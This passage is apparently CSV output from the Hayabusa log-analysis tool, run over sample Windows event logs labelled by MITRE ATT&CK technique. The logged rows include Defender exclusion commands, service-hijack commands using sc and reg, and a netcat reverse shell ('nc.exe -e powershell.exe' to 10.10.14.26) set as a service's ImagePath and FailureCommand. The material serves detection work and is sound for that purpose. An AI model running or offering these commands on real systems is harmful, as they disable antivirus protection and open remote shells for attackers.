value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingCriticalFailureTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingNonCriticalTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanAvgCPULoadFactor""; value=""0"" ParameterBinding(Set-MpPreference): name=""CheckForSignaturesBeforeRunningScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""ScanPurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanOnlyIfIdleEnabled""; value=""False"" ParameterBinding(Set-MpPreference): name=""ThrottleForScheduledScanOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFirstAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureDefinitionUpdateFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureDisableUpdateOnStartupWithoutEngine""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFallbackOrder""; value="""" ParameterBinding(Set-MpPreference): name=""SharedSignaturesPath""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureUpdateCatchupInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""MeteredConnectionUpdates""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDatagramProcessing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCpuThrottleOnIdleScans""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableAutoExclusions""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisablePrivacyMode""; value=""False"" ParameterBinding(Set-MpPreference): name=""RandomizeScheduleTaskTimes""; value=""False"" ParameterBinding(Set-MpPreference): name=""SchedulerRandomizationTime""; value=""0"" ParameterBinding(Set-MpPreference): name=""DisableBehaviorMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIntrusionPreventionSystem""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIOAVProtection""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRealtimeMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScriptScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableArchiveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupQuickScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableEmailScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRemovableDriveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRestorePoint""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningMappedNetworkDrivesForFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningNetworkFiles""; value=""False"" ParameterBinding(Set-MpPreference): name=""UILockdown""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableBlockAtFirstSeen""; value=""False"" ParameterBinding(Set-MpPreference): name=""CloudExtendedTimeout""; value=""0"" ParameterBinding(Set-MpPreference): name=""EnableLowCpuPriority""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFileHashComputation""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFullScanOnBatteryPower""; value=""False"" ParameterBinding(Set-MpPreference): name=""ProxyPacUrl""; value="""" ParameterBinding(Set-MpPreference): name=""ProxyServer""; value="""" ParameterBinding(Set-MpPreference): name=""ForceUseProxyOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableTlsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableHttpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsOverTcpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableSshParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableGradualRelease""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionDownLevel""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowDatagramProcessingOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableDnsSinkhole""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableInboundConnectionFiltering""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRdpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableNetworkProtectionPerfTelemetry""; value=""False"" ParameterBinding(Set-MpPreference): name=""TrustLabelProtectionStatus""; value=""0"" ParameterBinding(Set-MpPreference): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-MpPreference): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender default action allow any (PowerShell).evtx 2021-10-06 19:08:33.672 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender default action allow any (PowerShell).evtx 2021-10-06 19:08:33.680 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender default action allow any (PowerShell).evtx 2021-10-06 19:08:33.683 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender default action allow any (PowerShell).evtx 2021-10-06 20:14:56.275 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx 2021-10-06 20:14:56.300 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-MpPreference -ExclusionPath c:\document\virus\,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx 2021-10-06 20:14:56.424 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-MpPreference): ""Set-MpPreference"" ParameterBinding(Set-MpPreference): name=""ExclusionPath""; value=""c:\document\virus\"" ParameterBinding(Set-MpPreference): name=""QuarantinePurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingAdditionalActionTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingCriticalFailureTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingNonCriticalTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanAvgCPULoadFactor""; value=""0"" ParameterBinding(Set-MpPreference): name=""CheckForSignaturesBeforeRunningScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""ScanPurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanOnlyIfIdleEnabled""; value=""False"" ParameterBinding(Set-MpPreference): name=""ThrottleForScheduledScanOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFirstAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureDefinitionUpdateFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureDisableUpdateOnStartupWithoutEngine""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFallbackOrder""; value="""" ParameterBinding(Set-MpPreference): name=""SharedSignaturesPath""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureUpdateCatchupInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""MeteredConnectionUpdates""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDatagramProcessing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCpuThrottleOnIdleScans""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableAutoExclusions""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisablePrivacyMode""; value=""False"" ParameterBinding(Set-MpPreference): name=""RandomizeScheduleTaskTimes""; value=""False"" ParameterBinding(Set-MpPreference): name=""SchedulerRandomizationTime""; value=""0"" ParameterBinding(Set-MpPreference): name=""DisableBehaviorMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIntrusionPreventionSystem""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIOAVProtection""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRealtimeMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScriptScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableArchiveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupQuickScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableEmailScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRemovableDriveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRestorePoint""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningMappedNetworkDrivesForFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningNetworkFiles""; value=""False"" ParameterBinding(Set-MpPreference): name=""UILockdown""; value=""False"" ParameterBinding(Set-MpPreference): name=""Force""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableBlockAtFirstSeen""; value=""False"" ParameterBinding(Set-MpPreference): name=""CloudExtendedTimeout""; value=""0"" ParameterBinding(Set-MpPreference): name=""EnableLowCpuPriority""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFileHashComputation""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFullScanOnBatteryPower""; value=""False"" ParameterBinding(Set-MpPreference): name=""ProxyPacUrl""; value="""" ParameterBinding(Set-MpPreference): name=""ProxyServer""; value="""" ParameterBinding(Set-MpPreference): name=""ForceUseProxyOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableTlsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableHttpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsOverTcpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableSshParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableGradualRelease""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionDownLevel""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowDatagramProcessingOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableDnsSinkhole""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableInboundConnectionFiltering""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRdpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableNetworkProtectionPerfTelemetry""; value=""False"" ParameterBinding(Set-MpPreference): name=""TrustLabelProtectionStatus""; value=""0"" ParameterBinding(Set-MpPreference): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-MpPreference): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx 2021-10-06 20:14:56.425 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx 2021-10-06 20:14:56.432 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx 2021-10-06 20:14:56.435 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx 2021-10-06 20:15:06.651 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx 2021-10-06 20:15:06.667 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-MpPreference -ExclusionExtension '.exe',../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx 2021-10-06 20:15:06.754 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-MpPreference): ""Set-MpPreference"" ParameterBinding(Set-MpPreference): name=""ExclusionExtension""; value="".exe"" ParameterBinding(Set-MpPreference): name=""QuarantinePurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingAdditionalActionTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingCriticalFailureTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingNonCriticalTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanAvgCPULoadFactor""; value=""0"" ParameterBinding(Set-MpPreference): name=""CheckForSignaturesBeforeRunningScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""ScanPurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanOnlyIfIdleEnabled""; value=""False"" ParameterBinding(Set-MpPreference): name=""ThrottleForScheduledScanOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFirstAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureDefinitionUpdateFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureDisableUpdateOnStartupWithoutEngine""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFallbackOrder""; value="""" ParameterBinding(Set-MpPreference): name=""SharedSignaturesPath""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureUpdateCatchupInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""MeteredConnectionUpdates""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDatagramProcessing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCpuThrottleOnIdleScans""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableAutoExclusions""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisablePrivacyMode""; value=""False"" ParameterBinding(Set-MpPreference): name=""RandomizeScheduleTaskTimes""; value=""False"" ParameterBinding(Set-MpPreference): name=""SchedulerRandomizationTime""; value=""0"" ParameterBinding(Set-MpPreference): name=""DisableBehaviorMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIntrusionPreventionSystem""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIOAVProtection""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRealtimeMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScriptScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableArchiveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupQuickScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableEmailScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRemovableDriveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRestorePoint""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningMappedNetworkDrivesForFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningNetworkFiles""; value=""False"" ParameterBinding(Set-MpPreference): name=""UILockdown""; value=""False"" ParameterBinding(Set-MpPreference): name=""Force""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableBlockAtFirstSeen""; value=""False"" ParameterBinding(Set-MpPreference): name=""CloudExtendedTimeout""; value=""0"" ParameterBinding(Set-MpPreference): name=""EnableLowCpuPriority""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFileHashComputation""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFullScanOnBatteryPower""; value=""False"" ParameterBinding(Set-MpPreference): name=""ProxyPacUrl""; value="""" ParameterBinding(Set-MpPreference): name=""ProxyServer""; value="""" ParameterBinding(Set-MpPreference): name=""ForceUseProxyOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableTlsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableHttpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsOverTcpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableSshParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableGradualRelease""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionDownLevel""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowDatagramProcessingOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableDnsSinkhole""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableInboundConnectionFiltering""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRdpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableNetworkProtectionPerfTelemetry""; value=""False"" ParameterBinding(Set-MpPreference): name=""TrustLabelProtectionStatus""; value=""0"" ParameterBinding(Set-MpPreference): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-MpPreference): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx 2021-10-06 20:15:06.755 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx 2021-10-06 20:15:06.762 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx 2021-10-06 20:15:06.766 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx 2021-10-07 23:52:54.848 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: REG ADD ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time"" /v FailureCommand /t REG_SZ /d ""C:\tmp\pentestlab.exe"" | Path: C:\Windows\System32\reg.exe | PID: 0x2a58 | User: admmig | LID: 0x5f72fee",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with Failure Command.evtx 2021-10-07 23:53:02.147 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc failure W32Time command= ""\""c:\Windows\system32\pentestlab.exe\"""" | Path: C:\Windows\System32\sc.exe | PID: 0xa00 | User: admmig | LID: 0x5f72fee",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with Failure Command.evtx 2021-10-08 00:36:23.429 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc config xboxgip binPath= ""C:\windows\system32\pentestlab.exe"" | Path: C:\Windows\System32\sc.exe | PID: 0x29cc | User: admmig | LID: 0x5f72fee",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with malicious path.evtx 2021-10-08 00:36:24.892 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\xboxgip"" /v ImagePath /t REG_SZ /d ""C:\tmp\pentestlab.exe"" | Path: C:\Windows\System32\reg.exe | PID: 0x11b8 | User: admmig | LID: 0x5f72fee",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with malicious path.evtx 2021-10-08 03:21:36.864 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with malicious path.evtx 2021-10-08 03:21:36.889 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Set-ItemProperty -path HKLM:\System\CurrentControlSet\services\xboxgip -name ImagePath -value ""C:\nc.exe -e powershell.exe 10.10.14.26 4447""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with malicious path.evtx 2021-10-08 03:21:37.136 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-ItemProperty): ""Set-ItemProperty"" ParameterBinding(Set-ItemProperty): name=""Path""; value=""HKLM:\System\CurrentControlSet\services\xboxgip"" ParameterBinding(Set-ItemProperty): name=""Name""; value=""ImagePath"" ParameterBinding(Set-ItemProperty): name=""Value""; value=""C:\nc.exe -e powershell.exe 10.10.14.26 4447""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with malicious path.evtx 2021-10-08 03:21:37.137 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with malicious path.evtx 2021-10-08 03:21:37.143 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with malicious path.evtx 2021-10-08 03:21:37.146 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with malicious path.evtx 2021-10-08 03:30:51.237 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with Failure Command.evtx 2021-10-08 03:30:51.247 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Set-ItemProperty -path HKLM:\System\CurrentControlSet\services\xboxgip -name FailureCommand -value ""C:\nc.exe -e powershell.exe 10.10.14.26 4447""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with Failure Command.evtx 2021-10-08 03:30:51.251 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-ItemProperty): ""Set-ItemProperty"" ParameterBinding(Set-ItemProperty): name=""Path""; value=""HKLM:\System\CurrentControlSet\services\xboxgip"" ParameterBinding(Set-ItemProperty): name=""Name""; value=""FailureCommand"" ParameterBinding(Set-ItemProperty): name=""Value""; value=""C:\nc.exe -e powershell.exe 10.10.14.26 4447""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service 